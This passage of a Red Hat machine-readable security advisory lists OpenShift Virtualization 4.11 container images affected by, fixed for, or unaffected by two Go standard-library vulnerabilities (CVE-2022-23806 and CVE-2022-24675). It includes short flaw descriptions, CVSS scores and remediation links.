"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053429", }, ], notes: [ { category: "description", text: "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 & 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23806", }, { category: "external", summary: "RHBZ#2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23806", url: "https://www.cve.org/CVERecord?id=CVE-2022-23806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.1, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", }, { cve: "CVE-2022-24675", cwe: { id: "CWE-120", name: "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')", }, discovery_date: "2022-04-21T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2077688", }, ], notes: [ { category: "description", text: "A buffer overflow flaw was found in Golang's library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/pem: fix stack overflow in Decode", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope.\n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang & go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat follows best practice and federal requirements for least privilege, allowing only specific processes to be run with isolated accounts specific to the team and federal platforms that have limited privileges that are only used for a single task. The environment leverages file integrity checks and malicious code protections, such as IPS/IDS and antimalware solutions, to help detect and prevent malicious code that attempts to exploit buffer overflow vulnerabilities. Robust input validation and error-handling mechanisms ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", 